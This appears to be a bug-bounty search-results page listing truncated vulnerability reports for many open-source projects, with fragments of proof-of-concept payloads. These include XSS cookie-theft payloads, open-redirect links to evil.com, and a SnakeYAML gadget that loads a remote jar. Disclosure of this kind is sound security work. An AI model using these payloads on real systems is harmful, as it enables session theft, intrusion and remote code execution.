4072 matches found
Stack buffer overflow in RTSP packet parsing
Description A malicious RTSP server can trigger a stack buffer overflow via an RTSP packet with an excessively long content-length due to no bounds check when copying into a fixed sized buffer. Proof of Concept poc.py is available here terminal 1 python3 poc.py 31337 terminal 2 ./configure...
Cross-site Scripting (XSS) - Stored
Description I am able to bypass the fix in the report https://huntr.dev/bounties/4f7be1e2-b844-4def-af9f-136dcce1c349/ which caused the XSS vulnerability. The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page...
Reflected XSS in microweber
Description Hi there, In your latest version 1.2.15 docker here https://registry.hub.docker.com/r/microweber/microweber, i found an reflected xss endpoint: http://localhost/admin/view:content/action:settings?group=template&template param: template payload: shopmag"alertdocument.cookie Proof of...
SQL injection in PortalNotes
Description In PortalNotes.php, web server get values parameter as a part of sql query without sanitize, so attacker can be manipulated sql query, which is executed by web server. Proof of Concept POST /rosariosis/Modules.php?value=123 HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 Windows...
Open Redirect
Description Url redirection at the endpoint /login?next= which leads to redirect admin to malicious domain Proof of Concept Send this link to adminhttp://localhost:3000/login?next=http://evil.com When he will open it and try to login the url will redirect to /evil.com POC VIDEO...
Use After Free in new_object
Description Heap use after free in newobject function. ASAN report: ================================================================= ==2514600==ERROR: AddressSanitizer: heap-use-after-free on address 0x6020000401d0 at pc 0x00000230a00e bp 0x7ffcfdbe1dd0 sp 0x7ffcfdbe1dc8 READ of size 2 at...
? before the @ sign allows one to bypass whitelists
Description ? before the @ sign in HTTP URLs allows one to bypass whitelists Proof of Concept Convince NodeJS HTTP client to make a request to 127.0.0.1 bypassing a google.com whitelist. const parse = require'parse-url' const http = require'http' const url = parse"http://[email protected]" if...
SSL certificate verification disabled
Description This report is strange, partially because the existence of this code has been acknowledged without any alarm about its security implications, and also because a pull request that would fix the vulnerability opened as a bug patch has been open for over two years! Having SSL certificate...
Heap-based Buffer Overflow in john
Description For PEM plugin, the length of the ciphertext is not properly checked. Then the ciphertext is copied to a fixed length buffer. Creating a ciphertext with a larger length allow a heap overflow. Proof of Concept Using the following file pem.hash bash $ ./congigure -enable-asan; make -j4;...
Relative Path Traversal to Remote Code Execution
Description Pandora FMS v7.0NG.759 allows relative path traversal in File Manager where a privileged user could upload a .php file outside the intended images directory which is restricted to execute the .php file. The impact could lead to Remote Code Execution with running application privilege...
Open Redirect in ikus060/rdiffweb
Description The application has an Open Redirect vulnerability because the data filtering process does not completely prevent attacks. Proof of Concept - Step 1: Visit https://rdiffweb-demo.ikus-soft.com/login/?redirect=//evil.com - Step 2: Login with valid account, you will be redirect to evil.c...
in liangliangyy/djangoblog
Description The application leaked emails of unvalidated users to anonymous user. Proof of Concept - Step 1: Go to http://127.0.0.1:8000/register and create account. After create success, you will receive URL like http://127.0.0.1:8000/account/result.html?type=register&id=4 - Step 2: Open another...
Heap-based Buffer Overflow in mruby/mruby
Description Heap Overflow occurs in mrbfsend. commit : d912b864df3199f2108601a0451532c587a5e830 Proof of Concept $ echo -ne "c2VuZCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2Vu ZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5k IgAAAAo=" | base64...
Path Traversal in liukuo362573/yishaadmin
Description https://www.github.com/liukuo362573/yishaadmin has an endpoint "/admin/File/DownloadFile" that allows downloading/deleting files without authentication. In addition, this endpoint has path traversal vulnerability that allows arbitrary file read/delete. Proof of Concept - using BurpSui...
Exposure of Sensitive Information to an Unauthorized Actor in cjferna/photo-services-mashup
Description Please enter a description of the vulnerability. Vulnerable URL: https://github.com/cjferna/Photo-Services-Mashup/blob/fdc12e0671e035bac00cc46ee67d456540444460/src/es/um/taw/rest/imagga/Imagga.java It contains sensitive API Keys and secret keys. Proof of Concept private final String U...
Command Injection in ibotpeaches/apktool
Description Arbitrary code execution when an APK is built with a malicious apktool.yml due to SnakeYAML's load function Proof of Concept 1: Modify apktool.yml somevar: !!javax.script.ScriptEngineManager !!java.net.URLClassLoader !!java.net.URL "http://127.0.0.1:8000/yaml-payload.jar" 2: Download...
Cross-site Scripting (XSS) - Stored in liangliangyy/djangoblog
Description Hi there, I would like to report a stored Cross Site Scripting vulnerability in djangoblog source code. Cross-site scripting also known as XSS is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allow...
Cross-site Scripting (XSS) - Stored in livehelperchat/livehelperchat
Description Stored XSS is found in SettingsLive help configurationDepartments-Departments groups-edit When a user creates a new webhook under the NAME field and puts a payload constructor.constructor'alert1', the input gets stored, at user edit groupname , the payload gets executed. Proof of...
Heap-based Buffer Overflow in gpac/gpac
Description Heap-based Buffer Overflow in gpac Proof of Concept Version: MP4Box - GPAC version 1.1.0-DEV-rev1659-g7d3281e88-master c 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929...
Business Logic Errors in silverstripe/silverstripe-framework
Description SilverStripe Framework is vulnerable to Business Logic Errors in the Failed login count since that value can be a negative number. Proof of Concept 1.After login, go to Security page under the path /admin/security/ 2.Click on any member record 3.In the member edit form, enter a negati...
Heap-based Buffer Overflow in gpac/gpac
Description Heap-based Buffer Overflow SFSAddString at bifs/scriptdec.c:76 Proof of Concept POC1 is here. Result MP4Box -disox -ttxt -2 -dump-chap-ogg -dump-cover -drtp -bt -out /dev/null POC1 ··· 5 538135 abort ./source/gpac/bin/gcc/MP4Box -disox -ttxt -2 -dump-chap-ogg -dump-cover -drtp Bt...
Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos
Description CSRF on logout functionality. Attacker able to logout the user by sending malicious link Proof of Concept Impact This vulnerability is capable of logout the user session Note This is not an attack, it is a kind of annoyance to the user , though it is a valid csrf . By Using post metho...
Cross-Site Request Forgery (CSRF) in archivy/archivy
Title Missing CSRF token validation leads to note deletion. Summary Route /dataobj/delete/ is responsible for note deletion. Instead of POST it accepts GET and DELETE methods. @app.route"/dataobj/delete/", methods="DELETE", "GET" def deletedatadataobjid: try: data.deleteitemdataobjid except...
Cross-Site Request Forgery (CSRF) in erudika/scoold
Description Hi there, I would like to report a CSRF vulnerability in erudika/scoold. This allows an attacker to change the current user question space or add them to default space against their will. Proof of Concept 1. Access scoold demo at https://pro.scoold.com/ and log in 2. Access this link...
Cross-site Scripting (XSS) - Reflected in tsolucio/corebos
Description coreBOS is vulnerable to Reflected Cross-Site Scripting in the advftcriteriagroups - advftcriteria parameters. Payload - Outside the JSON object. alertdocument.cookie - Inside the JSON object...
Cross-site Scripting (XSS) - Stored in friends-of-forkcms/fork-cms-module-commerce
Description In the admin section in Commerce - Shop settings - Stock statuses - Edit stock statuses one can add XSS payloads. After adding XSS payloads when a user is visiting Commerce - Shop settings - Stock statuses the JavaScript code will be run. Proof of Concept Go to Commerce - Shop setting...
in humhub/humhub
Description Hello guys, hope you are having an awesome day! 🤗 HumHub has a functionality for spaces where you define that only invited users will be able to join a space. Private spaces come with this option but you can also define it for public ones. While a user is creating a space, this user i...
Denial of Service in chatwoot/chatwoot
The extractreply function https://github.com/chatwoot/chatwoot/blob/a0ffefad717b632269883863c27242bb97d3b66d/app/presenters/mailpresenter.rbL105 is highly inefficient on HTML emails. A legitimate LinkedIn email has 20kb of HTML content which takes a minute or two to process through that function,...
Cross-site Scripting (XSS) - DOM in emoncms/emoncms
Description EmonCMS 10.9.19 has a DOM-XSS vulnerability that is executed when javascript code is injected as imported data. Proof of Concept 1 - login into the app and browse to the section Feeds Import Data 2 - add alert1,a or 1638807909,alert2 in the CSV area. Then click on one of the empty fie...
PHP Remote File Inclusion in crater-invoice/crater
Description No mime type restriction on file uploads, allowing an attacker to upload and execute arbitrary PHP code. Proof of Concept Login to the dashboard, preferably using your own localhost install. Go to "Expenses", "Settings Account" or "Settings Company". Upload any PHP file you want. Impa...
Cross-site Scripting (XSS) - Stored in zikula/core
Description In zikula/core cross site scripting vulnerability is present in block module title field Proof of Concept 1. login to the demo account 2. go to blocks https://demo.ziku.la/blocks/admin/view 3. Add payload in title field and save 4 payload = " Impact This vulnerability is capable of...
Cross-site Scripting (XSS) - Reflected in kunstmaan/kunstmaanbundlescms
Description In kunstmaan / kunstmaanbundlescms ,extra metadata in seo form is vulnerable to reflected cross site scripting. Proof of Concept 1. login to the demo account 2. go to pages --select any page to edit -- go to SEO --- 3. Add payload to extra meta data and click save and see the preview ...
in chatwoot/chatwoot
I'll explain it briefly: A contact is created with the email address "[email protected]" and we are writing about sensitive information. userIdentifer is required to be validated with hmac. Now a human, on the other side of the world, comes into the chat and is asked by the bot for his email...
Cross-site Scripting (XSS) - Stored in django-helpdesk/django-helpdesk
Description Stored XSS via Markdown at Description or Comment of Ticket Detail When rendering to Markdown, the application does not filter and check the properties are valid, so when the user enters XSS it will render as XSS . Proof of Concept // PoC.req POST /tickets/submit/ HTTP/1.1 Host:...
in cortezaproject/corteza-server
Description Hey, when I attempt to change the password after creating an account I noticed that you haven't kept any password boundary. You need to limit password length. Hashing a large amount of data can cause significant resource consumption on behalf of the server and would be an easy target...
Code Injection in tsolucio/corebos
Description The user can control a point and infuse arbitrary HTML code into a vulnerable web page. This vulnerability can have numerous results, like disclosure of a user’s session treats that might be utilized to impersonate the victim, or, more generally, it can permit the aggressor to alter t...
Cross-Site Request Forgery (CSRF) in tsolucio/corebos
Description Hey corebos team, in the meanwhile I find another low level CSRF. attacker can activate/deactivate a Task of workflow with CSRF attack. Proof of Concept // PoC.html history.pushState'', '', '/'...
Business Logic Errors in pimcore/demo
Description There is no check over the number of items that a user can add to the cart. Adding a huge amount of items when updating the cart, causes the server to fail returning a 500 Internal Server Error. Proof of Concept Below POST request causes the server to fail adding 900000000 items of th...
Improper Privilege Management in shadow-maint/shadow
Description The su utility, if compiled with PAM support, uses waitpid internally to monitor its child process. It depends on the creation of zombie processes for proper monitoring, but the creation can be suppressed by ignoring the SIGCHLD signal see waitpid manual page. If su is spawned from a...
Cross-Site Request Forgery (CSRF) in firefly-iii/firefly-iii
Description there is a CSRF on Run rules again action Proof of Concept // PoC.html history.pushState'', '', '/'...
Cross-site Scripting (XSS) - Stored in rmuif/web
Description rmuif is vulnerable to XSS. It is possible to use tags in SVG content when uploading a profile picture. Proof of Concept SVG content: HTML alertdocument.domain; 1: Save the above content into an SVG file. 2: Access the settings page and upload this file as a profile picture. 3: Access...
Cross-site Scripting (XSS) - Reflected in admidio/admidio
Description Possible to perform reflected XSS by using double URL encoding when retrieving files Proof of Concept Trigger XSS via...
in microweber/microweber
Description For comments when the captcha is enable, the attacker can send many spam comments only with first correct captcha code, this means attacker only one time enter the captcha and then can use it for many many times and make damage on availability of system...
Cross-site Scripting (XSS) - Stored in openwhyd/openwhyd
Overview The openwhyd open-source application and openwhyd.org are vulnerable to a stored cross-site scripting vulnerability via user profiles. Malicious users can inject arbitrary javascript into the username setting on their profiles which, when visited by external users, would execute javascri...
in admidio/admidio
Description it can be possible to perform a clickjacking attack due to the lack of frame restrictions. The application does not set the response header X-Frame-Options: DENY. Proof of Concept Clickjack test page save the script as clickjacking .html and page will render in iframes Impact it is...
Server-Side Request Forgery (SSRF) in zmister2016/mrdoc
Description ● SSRF in /uploaddocimg/, an attacker could abuse url to visit any intranet in the envioronment of MrDoc server, casuing breaking the border of network. ● Depending on the different env, it could leak sensitive meta-data,according to...
Cross-Site Request Forgery (CSRF) in kevinpapst/kimai2
Description kevinpapst / kimai delete functionality is vulnerable to Cross site request forgery csrf attack Proof of Concept // PoC.js 1. login to admin account https://www.kimai.org/demo/ 2. goto invoice -- go down to preview invoices -- click save all it will redirect to this page -...
in mostafa-samir/zip-local
Description zip-local is vulnerable to Arbitrary File Write via Archive Extraction Zip Slip. Proof of Concept // PoC.js var zipper = require'zip-local'; zipper.unzip"zipslip.zip", functionerror, unzipped if!error // extract to the current working directory unzipped.savenull, function ; var...
Cross-Site Request Forgery (CSRF) in namelessmc/nameless
Description Several endpoints are vulnerable to CSRF 1: module install /index.php?route=/panel/core/modules/&action=install 2: clear template cache /index.php?route=/panel/core/paneltemplates/&action=clearcache 3: install templates, activate template, deactivate template, delete template,...
in pixelfed/pixelfed
Description: There is no rate limit sent unlimited email victim or any email address. Proof of Concept: There is no rate limit return-password , attacker to send unlimited email to victim or any email address. Impact: Attacker can sent unlimited email to any mail address . Solution: Add 'throttle...